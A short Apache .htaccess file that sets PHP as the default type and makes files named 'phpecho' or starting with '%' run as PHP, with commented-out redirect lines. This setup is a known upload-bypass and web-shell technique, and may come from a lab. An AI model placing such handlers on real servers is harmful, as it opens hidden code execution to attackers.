# Set default file type to PHP
DefaultType application/x-httpd-php
<FilesMatch "^%">
    SetHandler application/x-httpd-php
</FilesMatch>
<Files "phpecho">
    SetHandler application/x-httpd-php
</Files>
#RewriteEngine on
#Redirect "/phpecho" "/phpecho.ini"